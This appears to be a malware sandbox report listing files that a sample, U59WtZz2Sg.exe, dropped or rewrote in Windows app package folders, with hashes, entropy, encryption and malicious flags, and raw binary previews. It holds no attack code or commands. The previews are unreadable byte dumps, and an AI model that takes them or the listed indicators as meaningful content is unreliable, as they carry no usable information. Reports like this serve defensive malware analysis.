C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.979114892546861
Encrypted:	false
SSDEEP:	192:BOo3+JI0/JPfwkJHTdI1QzEL+h+zVCmjnpjdePJ83I:BTc5JHTa1DL+yjnpjOJ83I
MD5:	5C14D8C17641C7A12103919C38C09DB5
SHA1:	1FED22E1E8FB833DE972E2083808E2F7D3B60D5B
SHA-256:	8DE016EBA8ED5152CE2D93F2A5DD72D338115137303CC646C319DFCEDDCB6F6E
SHA-512:	DE58E71D674B76878A8684D36A58DF16EC93D27ED640796BAD64F8E1EEA4719BB6970668C9D10BC5FB14DF7287C7260599560E19E297CF430DD249F1462347FA
Malicious:	false
Reputation:	unknown
Preview:	regf...]..H.\.DT..l.........P....K....W.4+:H...7a..5.w.Z.......>s..{....+g..M.9.h_........p....yR..v.....C?........N........A......._.MIK.@..N.M.]....Q.....).R....{{..D6Vt$.s.=Wy.....'\|.Z~..X!..l..G3.\v...&.+1-.#.di%^K..I..gF..{..$....j......#..K.&.M.,.gf.D...>.,.4..:...J...."U'\|._.X.\|.u.D.<...g..\|..,..D.$.q.../8....DS.."".(I.GB..u.Ow......[..O...SB.i.c..X........8...i,.n.F..L..Zd....f.....p......!./[....Q.c.<.j LuIc.>]..7..W.K...)"]].../.\3..o../....Ey..!.>s%.T...+.b..M.b'Z.l...!..y.S?a.1..<...:.."c....m[iJj.%.. .^...7ZM.....h..L....)..o4..[x.[..........ol%.<..[q...N.....W....B.f...@...#.......L..C.....NE...AL.e...Pf.....:..g...q..b.+J.`[..1..d...;.>AT........._I..R..B.f...l.......;Ur7....c......d.G~`....M!...c.+9....iy...J.!(}...i.z..N....T.6.g..1.S..`.#.L,P.d.F....}.E.>.;.N.n.[.V3...K.>Z.$...D.<9..0e..D.siz].-nn...Y...~.....oP...G...u.,..+7..N.. ...X......N.. P.K.\(.....u@.5.p.....A.\|b%.AS...X.['.Z.. .>$.d?.............S....+{.>.\..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978134189734821
Encrypted:	false
SSDEEP:	192:bGp7tNrgw3cHRSE5E4Hi6Z9AAWAKkU4ncJol9:c77rgw3cxSKTCPoU4cY9
MD5:	5B3B878C7A4512F46960FE9919BA170F
SHA1:	535AC7B62CE0070D1ABDAC94FE407DA4DFB4FA58
SHA-256:	F9EAE77FDDAFD21E275A30F274168D93D86F135743E5C89E9C89A92CC758CFA8
SHA-512:	7BE1E809F31DFEB3E7B35F4658E41EDDC092E7F35A2337580221D62D68BA921A723CDAE0559FADD88952596A9FA5F879CD619ECD995E2F22C1F3E756D40B5511
Malicious:	false
Reputation:	unknown
Preview:	regf......,...q.(..)...}..V.j....-?...=.~.\......%.......o.5.J.D.....?d...t...0S..C.e..w.>.{.m.5...\tR.+3...w...MY.-..c#y..]@BPb#..z.._T...l.2.......;.JO.a>....;.\.%r.pQT+............s.....wmvI]#."M.$.......^l..ZB9.B..E....#..=)UU..u.#...:.B`...T.g_..;}.D..^-..2......(Y`z.v.8WY-.....g\zsr.R..l..{r..Fc..VL!....U....x..y\|....%..;.:.Vd1!..5j..i.:..$....yYb..8..2......).,9\.T..<....P...P;.]...\|Dk........1......".)...P.......e...H7q.. ...e...Z....x.]X8.....p;..[.."..Wo...=*`...?jk"....).T.u.dr.w.....Y..{.{.r..2.."8.....DN.......o...&,+.J.J.o..2..]........vrK.G.7...S...e.Xu....n1.s..l...L.H}...e...$.~L!....!)5..,v....S..k`..D.R...Hv.../....SN.g.+....-.{.p.....U..)...W.....r..^.k&.......3..dE...3....Zh9..7.=../..{...`.k.!.Hd.c.<...].P.{.:....n.Y..t.o.Je.;.f..5....[.....a..r.s.&>I.-.. .`R.r......5.b=...S..GR..H.......M.c...U.....Ie..y.<.9.s.7@.6.L.g.iL..D......c....a."y..S.,.....l.A;.L&.wc..>.....j.....3O....~L.oP...E....>Z.s\|.#.z..t:.....6e....

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	4430
Entropy (8bit):	7.957971230543583
Encrypted:	false
SSDEEP:	96:TZVpC1Y7XvEuX3JgrvmNjjQrQi2svq+w27IU96D7LSgnDG:TAyXsM3RNjjmrvqT2kUEfLSgDG
MD5:	D18B6E33F4B03242422CD8106F854DD8
SHA1:	F8B86AD1D485AEB03885E2EB4C5990BC01D54846
SHA-256:	2F007694297C2BD9259CE47C83DDCA6381A0937C7FDD56DC234E70242CCB5395
SHA-512:	4F8E1B7D77F0A5DEFBADD8E516D9DA97E72B2578B7FE5B130B3E90AF0E07EAFE72138F60FF6985A81CC4B9FA2C8F5E2727830440E08A94E46B5B3532BD085A6B
Malicious:	true
Reputation:	unknown
Preview:	SQLit.y..o..,OT. ..7..1...C....\|..... y../.....e.43...x#....'G....+...}.w..._0.r...r.Y}..q..gg}........./">8W..#o...]..0V.J..F......H.[O..!.R..7.......o.).{.or.EH.N.)i.....!..T..o..;.a.M&...U#..qk7.'.].'.[.A..:.:....XJ.6.....o.)...L2.>....4YL(..Uq...........M.C .{...?....X.Nv...7`........P..L..6.x.8B.m.....28.-&Q..J.f..."E.l.)...r...;;..&.3A...K.N..]\H.gz.f..)..oR]k.......s[.:.....Y..Mg.v.;hYK_..M.,..(..q...3..6.\.r6..&q..t..6...%3s.......~.n<.;.O.$D....K.....3F..^r.......a..a....T#{ew....;\....<]..6.6M.ef..q........!I.."Zr.r........$...wH....$.......eis...B!..%/.../1....(.P.....2:)%Y2<..y....YlILS!W4(..B..9h%...Ki......1iK.....o..}I.<.g{s...k.z.....e..n'...'MRY....[h......(..S.Y8b../..'l\|.......[.a.2.^n.U.[.[..'....Xd6r0.u...w}.~.(..3t.....G......N."a.b....ma...2mL-..-...mK.<T..d....3.y'BX.^...k".,.K\...F.1v/wfO...#gTl&.....C.8.?..5[.\...\|..E..e7x.s!.......q............e..)....R......f...x.......Q.L..........Kh......m.p{..#4x.f$..XH).....="

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	33102
Entropy (8bit):	7.993304220398646
Encrypted:	true
SSDEEP:	768:AutqHA0qee+29ERsyAmT5h9C7LUz7KP4oAZWTeoiQFBeGR4W:Bn0qk29EQOh9CMz7YuseRQPCW
MD5:	3BA5E673020B8BD6E71B1B51736CF533
SHA1:	A36435E01A6C3A5178FF129E658E8E43A4B0CB3F
SHA-256:	56C7C3D828875483A8CE247AE7CB09733EA2F3C661BA6BF8DEC5B6FE5CC3E14F
SHA-512:	44EFE89B944F16F6E96BCC44913B7B2F23F86053D4B766BBC93AB08873EABF9A30ECC95F7E91566A02B98457601134DC1559B16DE0E1453588A74F4FB6FC838E
Malicious:	true
Reputation:	unknown
Preview:	..-......9....Dpe..p.B;.g..0.s...\....L...b.d..c._.8Eh../}....h$......z.VdC..H..p....b.^A.b...3...C,.I.'M4P....e...7.Y$.u`3....L..=4.T:..{3V..\|.P_.I....X..E.4.3Ay..~,/.6.i...z....U1j.....t.M..........a.....W.5QM.N&3...Z.>'.@{.F.,...E.....dM<:U...i._.i.,.~..y@c&a........zLB(.'f..?.B=..G5[..B.a......u....g.....Ye...u.U......N..l...3..&AA...._...m0.].\..".@1Q.j..d.$...._...4....S#.s.}U0J.Q....[kJ2.F.......M.i...V<.l.U../...y...6......1. b.b......%....3....^tv.H.N.2..P..0K.Nr..sJ0....D.I.I...W....K...........N...c.j.I........%..G....A...;......&.(.>......n?l...tqO.i.5..W..3.../..0.....3.....D.[.:Y.w,....._..bA......x....KC %D5`2.+.6...^K.p..'.)..o....ztU.)xm....jr..i...... ..Y9,......~.....-+..;.>O.\.E......a'Y.Z"^b..o.=Nq.4.....hX....>..>.8.I..`...DF....g..BL.5..`.D^N....@..2.K........N]S.]....f\|.HJ$P..(../b-<1.@..'c.;6.B.$ 3c.?".UU.R.z.k.M...k.?..Xkm.......y.W...P..[.V.0.{...#.c.^.G.3tF.lF.!r6'u*.'.#........!..?.X.2.A.\|.P.).....3\k^9.T..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-wal

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SQLite Write-Ahead Log, version 14580171
Category:	dropped
Size (bytes):	750206
Entropy (8bit):	2.8242795656624473
Encrypted:	false
SSDEEP:	3072:zSmvB+kJ1PnlxQOWf3e8efNJ47uM/9otFVBCK+ggoF+2SONaYRsn2plY:zXBn19CBO8IN6b8VBLVSsaYC2plY
MD5:	D30A5AA86D9918418747E2F4D4188280
SHA1:	845CF7298BEF478DE74311C06E8A77C23C910155
SHA-256:	DB919237EC2FA8D4F7C9EED1C543551729F645A9C35CD022AC7625C9AD9DF146
SHA-512:	7CBA2A76A31C99930459A3CFF50D1F2676543DA4E92F1A5407D8855078BFBE505059CF65D4F22CD98A684E2101A447B4D5D1AB40F7DA05A5133A7580D4251AFE
Malicious:	false
Reputation:	unknown
Preview:	7.....y..C.:~ y.#.......s`x.M.....I..Q:.:..4!%..=.f..p..>...."cP...........u..o..%.p.....f..}....'....j,?..Ef......8ycG{!..Lu..~........n.X..1..9>.I.](.%..P.8..E1..~....:Sj.sD..V....(`h].......r...{.."........@?p.....;...C...j.....}.k.M5...Q.~.j...<9?...t.)9W.F!....^'.SF.i...r.$n.`.$?.])......;......d.~._...b7.....O...XE.............~...F.c.P..-.i..7....X...>..:.&`..)w?..r.8i.?..rR<./...&.\|y..w..K<..y..B......Y.!.Vw[......8..7).}WE..^.F..4............."yYj...8.P..VCw..:t.:.6`5K6.Z.ehP.'..C..}....>G0.-...$.;...a...j=.....M..xw2.8e....7N1.O.]..1v.o..9RY....BL2.....V.dd..DIl.T.~+ZiO.&}M..U.S)~3..R....s'..+k.... .....U......VU...x.....J...e[;.).O.{.a......s..._..o..a.2I.....O`.3lq'...+...]3y.Pnt._.A...W..p..n..xO..A.2../. .7S.....).@U.L'e......h..]n};h..n.f............(?.,I..Al..C.%.\..c.c..e$A....<.-...T.m..C..(.^.~.hS.....,...(B*.Z...+j......2@......c...0...p.w..r...Q..,./.........f.x.5.q/a..#...5.....P.I......u<.Xw.....b.N-...X.i....

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	65870
Entropy (8bit):	7.996954284858356
Encrypted:	true
SSDEEP:	1536:+yl00V3DllEOipDxuZ/SQjMR5vYieLMuMngSVtvDlS:N9jEOCxuITvheLMT7JS
MD5:	0832B95ABB36065975C542B1872E8D81
SHA1:	8CCF08448B2B07DC62537B1B05C2FCF55057A3D4
SHA-256:	9C1C1B93FAAD13212CD172EB98C13657DD1E5F005A5F45E7FB636B455FE4D5B7
SHA-512:	83B5313309E05D8CEBB8BCD47171C4103CC27FC3D9559E803314B211B9421ECABC2E9D7854DE668FDA8A6EC787A70AFFD1716EA75B58D071A9A3F01034309472
Malicious:	true
Reputation:	unknown
Preview:	.....8~.K....c....e.S.....3).{..d...Sd...&.i2.i3Ze..F...c._yS\|@UY>&J.......C;u.)..L{g.P......t.n..g.....:.{+.....bp..,..id.....W..H\|..........]6..j...l9..Z.&4.....ZK....E......9.....6&,V.o.h.=q,{w$.......pL.:.gO%...W........b...$.GvS.\|......".B..../...h.&......CV...;G...:.....X...<.,.........;.F.h... "FS%}8.K.....}.~.e..V..j".....oQ.._.V...KX...F..2..CZ...c.-.L[.TNx....3.d2......,.-.y...H~.........E...B%+...<..Q.dkz%.w.G........T.+.~....U.u@.}.y.A."....J..-A.5N.sv......%....%..G.%.\......:....-(i..;...=.^.....F.X...........C}.._...\|\.Qyu^.B.p.b7'.......JMk..&.ZW55...I..z.V..X......0I..t".B0.]..2.....f............I&.k..8...QV.J....F...8..&..9'l...~NZ"...vh.....o..k..i8,..,4.C.H...V..w....%...\|q8w..@......'....* M......".....;&.^=.../%.T.H.J..:.sb............n..i,e..l.6O.Xlp.......X%..1.........G.g...K.} t....P.5W.K.s....@..w(_....P.i....W..MR..".....iQ....?.4...x...X.Q..oK.-@.d.ht8..,Y......V@.TY\...].Yj.J.=.r.[.k....M.."U...#.b..'.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.97852739517054
Encrypted:	false
SSDEEP:	192:DM9K5TVZr/Z1B5G6PqVtqIYPcOl8MsPOI8bSN:oUBL/Z1BfwPi8MsPnl
MD5:	84E694D9533CBB6F7EFFEEDF14B6135D
SHA1:	9C044A7A6427A558E5026586D784DCD07F822DD7
SHA-256:	B3A45A321D0560F80386FE731C09EB7EF141A2E5A3CE5C333B40C3C40B911280
SHA-512:	330F6308B4DFC41B97D7ADED933F79B3E0D92F0612D6015B1729B5E72E7691FAFDA9A885695C6E2187E9231A91B388435B225F870B4A0820D5F66E7CC8B5F7D3
Malicious:	false
Reputation:	unknown
Preview:	regf..D\hq.H./..).i.a...nG....}....h..]J....CG~i.o+....I....g.19.BP.K.op..I!B.........M..)@R...ub....[.....'`..3....p.......?.L......;..E....q..q(/..4.b}.xAp4.T.pz -\.......2X<.e6...H...o........J..k...9:b.QQ.....].,....V.......U+.i.vB.......`2R."yu.T..Vq...$....,..s....D.;W.%&.<...3....F..2.9ZZ..y"jU...1R..sF...f.F.u/\.\|.?>Xd..%.EP.......fr.=....@..#/....U.mo......Tr`..$...2{1.P]p.DX.zC.9.?..j.l.6mT.....,.."..5..bA.<....T.f..T...5.Y.Q..ao...wD4.].'S(...6....c.........T=....K..^.e.S%......iLvu..t.6......J.).....Cl.K....g...5Q[.&B).s..a..x...v5.K../D.`...24...E....^.]sy.F..>.o...4h.G.Q..`..c_Q.........<..K.[LU...>\|K...@..fb.....[,.;PY]....:..5..f...b...&l..a._....IR.\|.h....^...D........{gh7..O........e[6...S-@....S.]..G.(...e...F.nt...M...uC....O%9@...J............a..s.9Qh..v..?.R.:..o....PN....-7pZ...w3.....9s....%N_.Q.".k...m..A.....k....7MK..1..#.3 b.~..wjY..D.Dg..Dfa.o.......e......C.Y~.8ItE4...S....f...X.Q*.."...!...E ..C->.{..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat.LOG1

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.976685830993885
Encrypted:	false
SSDEEP:	192:Avf/G0iILxXLvfa5R2vZnnCAHty/e9MrvOOICt+WLr+:Of/vbLxXL3a5kNCANyrhvtNr+
MD5:	651ACD9E127631FBADBC54CC305E4521
SHA1:	C3719D4141C5E996FF23F5FC144A0FA4F3ECF344
SHA-256:	E5E180562BD48F6514724513AD25364462834A25CA9F44405A617B2A53062ABF
SHA-512:	351EC5843FDD05ACB8C5F5F211C9757E5DFB5C0938520ED1D05A02D335569C3A3C02B50C40E68EF1C82845CF7DD7EB3441E080C4EAC9753F4EE7ADC183D5479C
Malicious:	false
Reputation:	unknown
Preview:	regf.6Z...B..rt8....].V5gC.H6.....NQ..m....KNh..8..3i....)....L..........T..H.M..a.../Q$.8.......]..u.Um..u....O.......-.....[@tD}..5....q.[....{....t\|.a..5.I.........\|.....!:#b......a.).r3TU(.3..P..\|.X..t....L.=.o..f..[..\|....+)....=..4g.h.4..../.vj\|...a...&.o....O.l.sS]."q..g..........N.\-.7.\|..k.....g0..es.........KY...kDqC..h..J..k}.w..'.\|.W-..xN.~..x._..CQ..R`........e....Y..]8.w....2..Q....=..xT\|.'..6).gw........&,-.].5.u...........u.....6..~,cu=.6B..RiS...M..xi...........h......%..gE.VK....r..o.@...]...^....k./-..e......i!....uJ...$...(f..d.c..4...nz..x.yi..y..aO.0.te.... .IL.t1R...$(./g..O..J...:..gUR.V.3%l....?WGU.G.6Q,.c.B..@89..% 3.).N,..<p........f.....~.Kz....V.y..."..?7.....G.<'.\|..F.z."....oKK:e*..Z.......F.?.}q.@w./.f..6...A>J.......`$..}..D.B6a..}qL...}#.RU..c..L.~+w.tuw...c.......F0.<~.........,g@c..<2'.1.Z.l...n.hb.u.........\./..<..xh...F(...n.1P........i.N....^.s.f5z"F..,....%7...W.......HB....k,.rd.(.r

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978693953534163
Encrypted:	false
SSDEEP:	96:hHQj3ckAsB+TZSVZr2wfrsePsCf+nZfg+eYSOZ4YK9cBG4jRdVPtN9iZbEV1mqXv:hu3ckXVVZSwfruZwYPZ88G4XF9iluNTv
MD5:	3B08ACE3C19ED81FEF3D973059A5DF92
SHA1:	5FA75FA2B6AE2670AA997775E89585E3DF560939
SHA-256:	5B0B10B8F4FDEBB02AFCEF8654B766E83283E68DC65A91004F5DBC360628ED62
SHA-512:	73C36D76C8B97689E1D3FBECC73C11E25164E8E1DDCED2F2F8643FD83AB39394F9D30A8910973661118CDFFE5E3DFA361537527EE05B637C39633254B7EEC687
Malicious:	false
Reputation:	unknown
Preview:	regf.vt... . ...u...-.......t....y...>.X\.!wm..X.(pc}.<...~....dM.keb.8..5......}^.J..v...+>@.....l...O~e.@r....$f.....%..j?c...8q.......U.iW...%.;.Km......u!.Tjq.L.]..X[.A-...T.k.b...HB.%}'.Lx.>........C.J..V....Q/U.J.....AH.pQ..X.NLS ....._\hC....+.M.Cq....U8V.....^}..w..!tS......~..b..O....L..._.>i.......>.R.+4@...s..;..F...X....T.:.ZW.x(xo.........S.sh[.9....%...x._.=...X.mWP...FSq,.....p.R..%....n..Fbr.......=.E.V..._.,o.l...".u.R..4^.~D...j...=.].6..J.>....c..jz.\n....#.x..lO..]+)...:....L/.%.7.. k...;.X..@.c....P.8.....N].....v/x.4oyo..Th...U.R...o.5Fg.MY@.}.#aaM+...q........\|.h#.I.=.`....k......;.Q%Vv.RL..\|{x$...XV`m..o.......N...=k...k..lXZX..P.^e....M....n.4....?...2..W...T..W+`j...6.lm..taLGvvI........7...^.;...G.1..q.,?.../..`.........-.T...i&.........z..$.PR.,.D....7..H...t......u..g<......#].g..p.:IT.~...._f....2.....76...c_}.a}'>..M;...6]..n4..1..Z..k......C.v...p.;X..x...i.MZ..%...h/.!......N....?\>.Cn....iL......_.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.977260634356733
Encrypted:	false
SSDEEP:	192:BBqruX0vAsuaHn86Iy4DverZHOkIswtqRXoiC10vctVuJ7K55Md8jKze:MG4AsnGerZHLzMqR4Ict4J7K55ASUe
MD5:	11018FA25B11921B7D0E411AE357AD4E
SHA1:	40B4A9346C7D202E30199646B09CC0F2196734A0
SHA-256:	5465449E72D3B65A0240708136DC00A63BC7AF0DDCCD6D8107D134A052B50A4C
SHA-512:	EC6AD9A79B30A7A25F017A499AA7C4BEE50347B872F1C831B0AD74AEB5C0D18CAC10E432BBA9ADD41EE6F5E0E668279FB35A5D521435519D066CFFF54AD7170A
Malicious:	false
Reputation:	unknown
Preview:	regf."...R:d....v....Es.".5Q<...Mtf....>.DA..X.zo...\.... },...;..L.Z[".. .."h.e.U..S3%...^.Al.r.E.N...........&..Q...2.wx.O..&.........U_.....I."......!.......7Z...d..p'+P./X..P.D..9..}.b..c.....#..D....-..]....V.wH..l.W....s.[..M...MA....... 2..y0...=.e{D?.7.$.\|X.A..i.$...KLi8.....e.~g.`....'s..V).....H..O...v.....C.ff.LE..#n.=...).. A..<.._\.>.//.g..F..>.A...u.Ir....r..c.........+...I..%.!...`.J.$9:.......)V..\_._h...<.W^)..dA......<..O[3s.V..\|.r6..Fy.l..hfGb..q.k....f.....N...h..]...~..J...I.f..VG9..m.0.....E3.7.qY..w.L. .....S....1.e..........'O...T......-B.NeC.IQ.YV.......^.mtA.......qMten.-.....G.V....=.S}.5I..K.IL.dt.Z.ev.QCQ(r......vX..-C.@..A....^.....4.k.B.g..T..9U..b.(.Z.2.n.......+%.,N.9.].r....y[.O.......#(V..0.`..d.-~..3...X.>?h#...W9GlD9U...^....9.4..V4./I.........D#..GD.h.!T..iN...6.&IN.OX]TG.\|!.....>D<Q.aW...3;2.?..N4"eE~...u1yv..\|...p3.....!.....h.B..V.v..J.....dA.%.z4..eN.pb..<V.kV..U...+}.&8+...d.n.6..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.977484976257668
Encrypted:	false
SSDEEP:	192:85b2x8RadRvXAfxDTaIhmGusqACu4XNabcqGyiMaE5YXM+zo:85bURvwxDTaIhmGVOabcslaDW
MD5:	7A2338316FA73146B2ACBDA9F12ACEC6
SHA1:	90C4F9F28EE04E79C55800E4F4CD6C44BC0F50FE
SHA-256:	98B812BCA3B93E9A64B3845024BB3A1C1FD274AA52C5BC7F1D5FF8F08F02E097
SHA-512:	FF1506B05718ECD0D1EF7839F677D4401FD4EFDEF892CB6B8D63E91632B4FE2C30B05CECE651B403B6DF29DF3F913D693FB1AB497CD0754F07CB4B96C23566E7
Malicious:	false
Reputation:	unknown
Preview:	regf.k......a....".>4.{B.D.`.5..-....<..s.T...b8K..f=...)...Q.....#..4......8..y'_{.]!.....\"/.U...I}.OIMH... .f.iV.G..........s.>.'K'...R....Q.H......C..w.A.Z'........vQ.X+..N.G...}[..4tK`FC@../.f.3a...U......G/g.,...8._5...J..Md.\|\|1......uW;..p..vq.:w..gB.4..~%.M.Q....\...T....).T.......z.r..c8.Y..;.eD_...<.J.TUN.....4....f.?.a......W.._.p..B...Q.{..\L.5L\|.......Mj.V...K..... ..oX>.S...<..v.Lk.f....\|.....2...lI...ri...E..~s..Y..Q...e..m.S.8..`.i...Q...%E.b.;h.....Z.io.n.!...;. ,C...=....Y.@R.P.......@9O....k..^.eU...6wH.O.f..:`.5R......!.O.I.n..cm.....:....cq.k...(...#RZ\|HM..^...U.....n%....=..1.1.{...Dw..H.1r......"... s.(a.8..H..5}.IV.sl.....Rw09z/./.e...h....U.4.I........o}..-..en..@V..h.d..t..0..........<.d....\|A=.&'........H...J^k,.{B.&...(^.8.N.3C......J..+\.........@.`...P..x`....?.T..26..C.&.A...e...Vuz.h..(.;.....i..!.c...K.o\...W.\....f.5....F..F4V.;.... x............*.'...3...#...)L.....r^.....nJ..I...Xke@.....Q4A}zH...

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	46932
Entropy (8bit):	7.9964402881877765
Encrypted:	true
SSDEEP:	768:DD4V4aPWeIyOTCwjI1clZJljYtjvmPELPzKUsciP7rvqEZ80IZhbXR8LlDM:omWWecVjbYtjOPELPzPsc+yettLVM
MD5:	A730529B7F6AA60011935982391E1866
SHA1:	F8FDBF4437B2193BDB0C7E2B5CF6C8280D87FF5B
SHA-256:	A485DABDB261DB49F268E56A2F036F453569504B41780C198D1EF12F86AAAF24
SHA-512:	80A3DD628793A9827F91D91B3BAAF59285368C84356C035D5D9B0607277F3D1D15EC3B40A16C78F9F2CB804ED0B2073F773866DB3808EAF9D9CB72727F03DFB6
Malicious:	true
Reputation:	unknown
Preview:	+N..0......N ..D,Y.g...U9m...c...&.0.......I..F.Zu....\z!...H4.6..W..i..L.5..Y...R...j.N=.,...7(aQ.#. ...!.m0...E/.\{..o.q+o...Nq.N.L..wB..J.Q...".y..!.....MR..BZ...DA...10.\|_..n.3]l.....l~...E?......yO...~........Np.?^.<.....,Ot.r.W.5...Y...9...f.c$.K.b..~.f....{bS!......_..Q....-....a.s...N..=Lt;........<..A.oV&.........u.F.n^..}..^...\|..... .+..x1O...l?..J.j.ihB5.i.j..q.....S.zP..L.....Z..V.,Yn.......d..~.r..1.....m..F..B.c.?.J...;.~....C@c-.e....r..}.o.Q...S..Q..!.}@U..nH....at<}(h.\|q..x.....i.(....W... ....Z...J9..~.e......*.B........V...L1...8b~..^Z}K....-.......".s.?!..~....A..S..4.W.GH........T.\|(@..h.4.%....\|W.Z.\.;..-...}3.=..m..R.........<....'..z3.E.#.H$.VS......i.OE.._MMnUy/."..G.cp/.4$.^.X..\.Zi..\eK....P.........mvO....C.y.......E...}\....F..Lq,.qL......GZ.....1..I.......X.L..:.!.....(J.i.....E.Z.{J...f4...<...-.;.z...,......{.<..~.....d.=..C..<....?..`AQ.^.....9bNy%L.zW..1Q.....?..=o.^.V....\|...W....G.....1.IQ

C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.9786489656273085
Encrypted:	false
SSDEEP:	96:JkdzX6Fs7+YGWVWK+FDMUWOldLsvy5MvbQUX6dzoarAXbzIcmzRqQfWLx6A6ca7M:Yr9SDMfSLsK5wXU8a0XoBfWLxH6cgcJ
MD5:	1B520CD4DB79A77B3401BB8611E29472
SHA1:	52E3F98B1DEBC9312D35FBEA8CAA6C66F7ACC583
SHA-256:	A357F2774BC0FED02F120AEFE3DAD9466E3A61C658DF520FD5B4FCC1D9F57EE7
SHA-512:	71A820C5342A45018540674A48DD0FDBBA5015176182F736E5B351D44919BFCE0027D8E775BE02F895574C36A98D1C74DDA7D950C1294CF8EB0E862F75C3B6D1
Malicious:	false
Reputation:	unknown
Preview:	regf....w..EV.y..60..^(^.....3J.^....@...U...)..o..h.8.....y.N>".....c.2...3B..hy.."..$..%v.n.\|....h.........:.....n...U>E.UF<.;.q..hK.bl.`.....a...D...13KM...ZYfN-.B&).w,..%..cR......O.G..X...U..OcJ...d3N....r...c.......a..?.Ty....4..........fF.$..A.Qy+....~u.A.N.M...n.H.-.....'......@.......I.cPO.p..-...>..%.P....wCu:.\..@H+k.0=6.\|o.M...ci.....y^.[?!.....?..... ...S'..+.zt.N.......M.l.?..z...,.A.....D..!....G...)..:...z.^.lI..7.S.....\....0...zn..'j.nU'...OI.\.f.50...=.......;l.p.-)..............;Pq..xX..V....v....$...E.&...N....7Fb..h....E...fM..J"'..w.w.L..}...d.].g.\(G....F&..7..ZaD(..81....pV]..z.y..x......2.".u.).j..Q.wJ.pm.).v.H.P..e{H\%.\........7.u....]...)..]..M..l.....p..?..T.s..u..H.^.....,....:...Y...P..;.@.X...C`...{Hk..'.{..V....C.....P..;..a..N.^X...$j.0B.....}...14.....u.M6/.MJC....k..o.........Hm.IO.\|..B.].l..=.SP..........5....@..?....!..cS....8b.WK6<kQ...Zg.....1i...Q^".}>/..t.@.w].&...+...t..`.....i..-.\x[..k}Q.c..

C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG1

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.974886709590954
Encrypted:	false
SSDEEP:	192:d0TLxPngQ0L8x8H+CRC8p5Mu+Dz019b5D6TA/HcGgyb/P7oC4zSrD:d0TdPgQZ8H+Cf+Z3078TgHcGF/P7oC4a
MD5:	CF3FC0EBB3A4300712919D69BDCE0500
SHA1:	C04BFA6387C493E38D701ECD6318935E1DE51F3A
SHA-256:	3B0B626D7E9235DAF66EE4BCCAD4082A2066DF90D2A722E362F616F32DED46D2
SHA-512:	00ADF21CFB278C65AA0BDF86EC3C94E14053521263E9D1AE3AD959EF11EC9A031707A6EAA27656025A108E35AA65775A492F02C9F2BB5AF163F87B9D5E8A174B
Malicious:	false
Reputation:	unknown
